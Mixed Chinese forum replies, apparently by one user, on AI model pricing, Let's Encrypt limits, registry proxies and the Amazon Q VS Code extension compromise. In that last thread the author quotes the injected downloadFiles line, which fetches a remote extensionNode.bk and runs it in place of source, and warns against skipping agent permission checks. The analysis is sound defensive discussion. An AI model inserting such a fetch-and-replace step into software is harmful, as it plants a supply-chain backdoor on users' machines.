很多人没试过 o3, 在网上风浪不大, o3 不适合一次性输出很多代码, 它很懒, 但是解决复杂问题独一档. 我的线程死锁问题只有 o3 能解.

慢炎舒宁含片, 我含这个睡第二天早上就不会喉咙痛, 可以试试, 对我很管用

@skiy 我的意思是 reset hard 加 force push, 这样就没有恶意文件的痕迹. 否则一个公开库泄露了 accesskey, 岂不是没法彻底清理提交的内容了?

@skiy 没明白, 这不是 force push 吗?

https://i.imgur.com/DMxJhmw.png

为避免已更新到 v1.84.0 的用户被攻击, 无论如何 v1.84.0/extensionNode.bk 必须要删除, 否则已发布的代码会下载: https://raw.githubusercontent.com/aws/aws-toolkit-vscode/amazonq/v1.84.0/scripts/extensionNode.bk 替换 extensionNode.ts 然后执行.

也就是说 amazon 无论如何都要 force push 一次, 清掉 extensionNode.bk 这个文件.

extensionNode.bk 是否曾经真实存在过, 已成悬案.

但这行代码痕迹仍在,

downloadFiles([`https://raw.githubusercontent.com/${REPO_NAME}/${TAG_NAME}/scripts/extensionNode.bk`], "src/", "extensionNode.ts")

@codehz @turygo @leir 给各位补充了代码库分析. 能实锤的是这个提交: https://github.com/aws/aws-toolkit-vscode/commit/678851bbe9776228f55e0460e66a6167ac2a1685

攻击者完成了第一步, 后续需要将恶意代码写到 extensionNode.bk, 可惜现在的确没有第二次提交的实证了.

medium.com 提到使用"Commit Trail"来确认第二次的提交, 需要在事发前后同步过该库的人查看, 新下载的 tag 已经看不到 extensionNode.bk 的提交.

@skiy 感谢分享, force push 是这个: https://github.com/aws/aws-toolkit-vscode/compare/215b32058086bb20bd2edc33c3d0dd624df1f449...4160c5baf630368edab09f7828f9d0f8ace6b527

force push 后 extensionNode.bk 的新建和删除记录就都没了.

@leir
https://github.com/aws/aws-toolkit-vscode/commits/v1.84.0/
下边这个 tag
https://github.com/aws/aws-toolkit-vscode/commits/amazonq/v1.84.0/

@zaqzhin 我用第二天了, claude api 的价格我也见识过, 所以我说 qwen3 很便宜. 见到都是抱怨扣了几十块的, 偶尔有扣了一两百的, 这些已经足够说明 qwen3 的便宜了.

@90928yao token 单价是简单的数学, token 消耗量确实不好评价.
@Grin1024 乘 1000 再除 7.2, 单价便宜.

qwen3 code 不仅不贵, 而且算比较便宜的, 说贵的是跟谁比较的呢?



这价格都是公开的, 一般在 3w-25w 这档, 阿里云的缓存是 40%的价格.


用 claude 何曾有过哪个问题只扣几毛钱人民币的, 最简单问题都是几块钱人民币, 单次会话几十美元的也并不稀奇.

不能睁眼说瞎话吧.

实话实说, 比 cloudflare 慢很多, 不过写都写了, 就发上来给大家玩玩, 研究下 ESA 可以怎么折腾.

Cloudflare : https://github.com/jqknono/cloudflare-registry-proxy
阿里云 ESA: https://github.com/jqknono/esa-registry-proxy

@nno 没有哪家模型和 ide 能在不改设置的情况下先查看.gitignore, .gitignore 文件可能在任意位置, 不一定在项目工程内.

个体户都可以用

赠送一个 letsencrypt 的坑.

- 每个注册域名每周最多 50 个证书
- 每个账户每三小时最多 300 次请求
- 每份证书最多 100 个域名
- 每周最多 5 张重复证书
- 续期证书不受限制

原链接: https://letsencrypt.org/docs/rate-limits/

如果你坚持要用 letsencrypt, 那每周只能卖 50 个用户. 如果共享证书, 则最多可以卖 5000 个, 但不同用户间的服务会产生关联. 删服务时不能删证书, 因为别人还在用, 需要从一个证书里移除一个域名, 但这会算一次重复证书, 而一周只能重复 5 次.

理论上简单, 涉及到细节非常让人掉头发.

https://adguardprivate.com 就是使用 tls sni 做的转发, 我可以证明实际是可以做出来工作的.

letsencrypt 只算一个小坑, k8s 及其组件, 以及网络问题上的坑会比较多.

总之你的想法理论上成立, 实际上也可以做出来, 只是实施起来会有很多细节需要注意.

真有人不分青红皂白就开干的, 强烈建议先学法律

@Dlad 结论是只能相信商誉. 商誉存疑就需要在模型多次工具调用时, 检视命令执行, 不要轻易使用 claude --dangerously-skip-permissions

还可以在容器内运行 claude code, 代码仓库映射到容器内进行开发, 隔离开环境. 具体可以了解 vscode 的插件 ms-vscode-remote.remote-containers

搞个 pad

可以判断下这个 hack 方案是否可行, https://github.com/jqknono/how-to-hack-as-model-router/blob/main/readme_zh-cn.md

分享的这个库的白名单通过 http header 的 auth 来实现, 属于用户白名单.
我写了个按镜像来做白名单的库, https://github.com/jqknono/cloudflare-registry-proxy
这个镜像白名单的镜像站点可以公开, 只能下载自己想分发的镜像.
docker pull registry.techfetch.dev/jqknono/weread-challenge:latest
我就只分发一个微信读书打卡器, 挺多小白不会用 docker 走代理.